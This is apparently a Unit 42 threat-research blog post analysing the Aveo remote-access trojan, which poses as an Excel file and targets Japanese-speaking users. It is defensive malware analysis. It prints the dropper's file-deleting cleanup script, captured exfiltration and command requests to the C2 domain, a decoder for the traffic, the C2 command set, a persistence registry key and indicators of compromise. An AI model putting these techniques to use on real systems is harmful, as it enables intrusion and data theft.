Aveo Malware Family Targets Japanese Speaking Users - Palo Alto Networks BlogPalo Alto Networks Blog Get Updates Sign up to receive the latest news, cyber threat intelligence and research from Unit 42. Business Email Submit Select a Category Select a Month Tweet 1 POSTED BY: Josh Grunzweig and Robert Falcone on August 16, 2016 11:00 PM FILED IN: Malware, Threat Prevention, Unit 42 TAGGED: Aveo, FormerFirstRAT, Ido Laboratory, microsoft, snoozetime Palo Alto Networks has identified a malware family known as ‘Aveo’ that is being used to target Japanese speaking users. The ‘Aveo’ malware name comes from an embedded debug string within the binary file. The Aveo malware family has close ties to the previously discussed FormerFirstRAT malware family, which was also witnessed being used against Japanese targets. Aveo is disguised as a Microsoft Excel document, and drops a decoy document upon execution. The decoy document in question is related to a research initiative led by the Ido Laboratory at the Saitama Institute of Technology. Upon execution, the Aveo malware accepts a number of commands, allowing attackers to take full control over the victim machine. The Aveo malware sample disguises itself as a Microsoft Excel document, as the icon below demonstrates. Note that the filename of ‘malware.exe’ is simply a placeholder, as the original filename is unknown. Figure 1 Microsoft Excel icon used by Aveo malware The executable is in fact a WinRAR self-extracting executable file, which will drop the decoy document and Aveo Trojan upon execution. The following decoy document is dropped and subsequently opened when run. Figure 2 Decoy document used with Aveo malware 7 LikeLike MORE → People of Palo Alto Networks: Dimitris Patsalas posted by Justin Hall on August 17, 2016 Aveo Malware Family Targets Japanese Speaking Users posted by Josh Grunzweig on August 16, 2016 Unit 42 Researchers Recognized in MSRC Top 100 List posted by Ryan Olson on August 16, 2016 Content That Respects the Value of Your Time posted by Scott Ciccone on August 15, 2016 Palo Alto Networks News of the Week – August 13, 2016 posted by Anna Lough on August 13, 2016 MORE → English 1.866.320.4788 Support Resources Research Search http://paloaltonetworks.com/ http://researchcenter.paloaltonetworks.com/ http://applipedia.paloaltonetworks.com/ http://researchcenter.paloaltonetworks.com/threat-vault/ https://www.paloaltonetworks.com/resources/research.html http://researchcenter.paloaltonetworks.com/tools/ https://support.paloaltonetworks.com/ https://www.paloaltonetworks.com/resources.html http://researchcenter.paloaltonetworks.com/ http://twitter.com/share http://researchcenter.paloaltonetworks.com/author/josh-grunzweig/ http://researchcenter.paloaltonetworks.com/author/robert-falcone/ http://researchcenter.paloaltonetworks.com/malware-2/ http://researchcenter.paloaltonetworks.com/threat-prevention-2/ http://researchcenter.paloaltonetworks.com/unit42/ http://researchcenter.paloaltonetworks.com/tag/aveo/ http://researchcenter.paloaltonetworks.com/tag/formerfirstrat/ http://researchcenter.paloaltonetworks.com/tag/ido-laboratory/ http://researchcenter.paloaltonetworks.com/tag/microsoft/ http://researchcenter.paloaltonetworks.com/tag/snoozetime/ http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ http://researchcenter.paloaltonetworks.com/wp-content/uploads/2016/08/Aveo-Malware-1-5.png http://researchcenter.paloaltonetworks.com/wp-content/uploads/2016/08/Aveo-Malware-2.png http://researchcenter.paloaltonetworks.com/wp-content/uploads/2016/08/Aveo-Malware-3.png http://researchcenter.paloaltonetworks.com/wp-content/uploads/2016/08/Aveo-Malware-4.png http://researchcenter.paloaltonetworks.com/wp-content/uploads/2016/08/Aveo-Malware-5.png / /government /partners /unit42 /technical-documentation /endpoint-2 http://www.addtoany.com/subscribe?linkname=Palo Alto Networks Blog&linkurl=http%3A%2F%2Fresearchcenter.paloaltonetworks.com%2Ffeed%2F http://researchcenter.paloaltonetworks.com/archives/ http://researchcenter.paloaltonetworks.com/2016/08/people-of-palo-alto-networks-dimitris-patsalas/ http://researchcenter.paloaltonetworks.com/author/justin-hall/ http://researchcenter.paloaltonetworks.com/author/josh-grunzweig/ http://researchcenter.paloaltonetworks.com/2016/08/unit42-researchers-recognized-in-msrc-top-100-list/ http://researchcenter.paloaltonetworks.com/author/ryan-olson/ http://researchcenter.paloaltonetworks.com/2016/08/content-that-respects-the-value-of-your-time/ http://researchcenter.paloaltonetworks.com/author/scott-ciccone/ http://researchcenter.paloaltonetworks.com/2016/08/palo-alto-networks-news-of-the-week-august-13-2016/ http://researchcenter.paloaltonetworks.com/author/anna-lough/ http://researchcenter.paloaltonetworks.com/archives/ This decoy document is hosted on the Ido Laboratory and contains information about a 2016 research initiative. The document lists participants in the 16th CAVE workshop, including names, affiliations, and email addresses of those involved. The document, written in Japanese, as well as the filename of this document, “CAVE研究会参加者.xls”, indicates that this malware was used to target one or more Japanese speaking individuals. Additionally, the similarities between the Aveo and FormerFirstRAT malware families, which will be discussed later in the post, further add evidence that Japanese speakers are being targeted. The Aveo Trojan is configured to communicate with the following domain name over HTTP. snoozetime[.]info This domain was first registered in May 2015 to ‘jack.ondo@mail.com’. Since that time, it has since been associated with the following three IP addresses: 104.202.173[.]82 107.180.36[.]179 50.63.202[.]38 All IP addresses in question are located within the United States. Figure 3 PassiveTotal screenshot showing associated IP addresses with snoozetime[.]info The WHOIS information for snoozetime[.]info lists a registrant email address of ‘jack.ondo@mail[.]com’ and a name of ‘aygt5ruhrj aygt5ruhrj gerhjrt’. Pivoting off of these two pieces of information to domains that share the same yields the following additional domains and email addresses. bluepaint[.]info coinpack[.]info 7b7p[.]info donkeyhaws[.]info europcubit[.]com jhmiyh.ny@gmail[.]com 844148030@qq[.]com After running the self-extracting executable, a number of files are dropped to the file system and the following execution flow is witnessed: Figure 4 Malware execution flow When the mshelp32.exe executable runs, it begins by reading in the setting32.ini file, which contains the name of the decoy document. This information is used to build a batch script, such as the following. This batch script is executed within a new process, and acts as a simple cleanup script that runs after Aveo and the decoy document are executed. The Aveo malware initially runs an install routine, which will copy itself to the following location: %APPDATA%\MMC\MMC.exe If for any reason the %APPDATA%\MMC directory is unable to be created, Aveo will use %TEMP% instead of %APPDATA%. After the malware copies itself, it will execute MMC.exe in a new process with an argument of the original filename. When executed, if this single argument is provided, the malware will delete the file path provided. After the installation routine completes, Aveo will exfiltrate the following victim information to a remote server via HTTP. Unique victim hash IP Address Microsoft Windows version Username ANSI code page identifier This information is exfiltrated to the ‘snoozetime[.]info’ domain, as seen in the following example HTTP request: To encrypt the provided data, the malware makes use of the RC4 algorithm, using a key of ‘hello’. As shown in the following image, the encryption routines between Aveo and FormerFirstRAT are almost identical, with only the algorithms and keys being changed. Figure 5 Comparison of encryption function between Aveo and FormerFirstRAT In order to decrypt the data provided via HTTP, the following code may be used: Running the code above yields the following results: 1 2 3 4 5 6 7 @echo off copy "CAVE研究会参加者.xls" "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls" del "CAVE研究会参加者.xls" /F /Q del mshelp32.exe /F /Q del setting32.ini /F /Q del "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe" del %0 /F /Q 1 2 3 4 5 GET /index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET Host: snoozetime[.]info Cache-Control: no-cache 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import base64 from binascii import * from struct import * from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey CALG_RC4 = 0x6801 CALG_MD5 = 0x8003 def decrypt(data): md5_hasher = CryptCreateHash(CALG_MD5) CryptHashData(md5_hasher, 'hello') generated_key = CryptDeriveKey(md5_hasher, CALG_RC4) decrypted_data = CryptDecrypt(generated_key, data) return decrypted_data for a in 'index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--' k,v = a.split("=") decrypted = decrypt(base64.b64decode(v.replace("-","="))) print "[+] Parameter {} Decrypted: {}".format(k, decrypted) After the initial victim information is exfiltrated, the malware expects a response of ‘OK’. Afterwards, Aveo will spawn a new thread that is responsible for handling interactive command requests received by the command and control (C2) server, as well as requests to spawn an interactive shell. Aveo proceeds to set the following registry key to point towards the malware’s path, thus ensuring persistence across reboots: HKCU\software\microsoft\windows\currentversion\run\msnetbridge A command handler loop is then entered, where Aveo will accept commands from the remote C2. While the Aveo malware family awaits a response, it will perform sleep delays of randomly chosen intervals between 0 and 3276 milliseconds. Should the C2 server respond with ‘toyota’, it will set that interval to 60 seconds. Aveo accepts the following commands, shown with their associated function. 1 : Execute command in interactive shell 2 : Get file attributes 3 : Write file 4 : Read file 5 : List drives 6 : Execute DIR command against path The following example request demonstrates the C2 server sending the ‘ipconfig’ command to the Aveo malware. C2 Request Aveo Response Aveo shares a number of characteristics with FormerFirstRAT, including encryption routines, code reuse, and similarities in C2 functionality. Aveo is far from the most sophisticated malware family around. As witnessed in the previously discussed FormerFirstRAT sample, this related malware family also looks to be targeting Japanese speaking users. Using a self-extracting WinRAR file, the malware drops a decoy document, a copy of the Aveo malware, and a cleanup script. Palo Alto Networks customers are protected from this threat in the following ways: 1 2 3 4 5 [+] Parameter 1 Decrypted: e8836687 [+] Parameter 2 Decrypted: 172.16.95.184 [+] Parameter 4 Decrypted: 6.1.7601.2.1 [+] Parameter 5 Decrypted: Josh Grunzweig [+] Parameter 6 Decrypted: 1252 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 GET /index.php?id=35468&1=niBo9x/bFG4- HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET Host: snoozetime[.]info Cache-Control: no-cache HTTP/1.0 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 11 Server: Werkzeug/0.11.10 Python/2.7.5 Date: Wed, 10 Aug 2016 16:00:11 GMT \xca89\xb4J\x82B?\xa5\x05\xe8 [Decrypted] 1 ipconfig 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 POST /index.php?id=35469&1=niBo9x/bFG4- HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET Host: snoozetime[.]info Content-Length: 1006 Cache-Control: no-cache \xca\x38\x39\xb4\x4a\x82\x42\x3f\xa5\x05\xe8\xdb\xda\x74\x8b\x79\x39 [Truncated] [Decrypted] 1 ipconfig Windows IP Configuration Ethernet adapter Bluetooth Network Connection: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : [Truncated] An AutoFocus tag has been created to track and monitor this threat WildFire classifies Aveo samples as malicious C2 domains listed in this report are blocked through Threat Prevention. SHA256 Hashes 9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2 8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d C2 Domains snoozetime[.]info Registry Keys HKCU\software\microsoft\windows\currentversion\run\msnetbridge File Paths %APPDATA%\MMC\MMC.exe %TEMP%\MMC\MMC.exe Name * Email * Website Post Comment Privacy Policy Legal Notices Site Index Subscriptions Copyright © 2007-2013 Palo Alto Networks https://autofocus.paloaltonetworks.com/#/tag/Unit42.Aveo /#facebook /#twitter /#google_plus https://www.addtoany.com/share_save https://www.paloaltonetworks.com/legal/privacy.html https://www.paloaltonetworks.com/legal.html https://www.paloaltonetworks.com/site-index.html https://www.paloaltonetworks.com/company/subscriptions.html Aveo Malware Family Targets Japanese Speaking Users Deployment SUBSCRIBE TO THE RESEARCH CENTER BLOG CATEGORIES & ARCHIVES RECENT POSTS Infrastructure Malware Analysis Aveo Malware Family Conclusion Indicators of Compromise Post Your Comment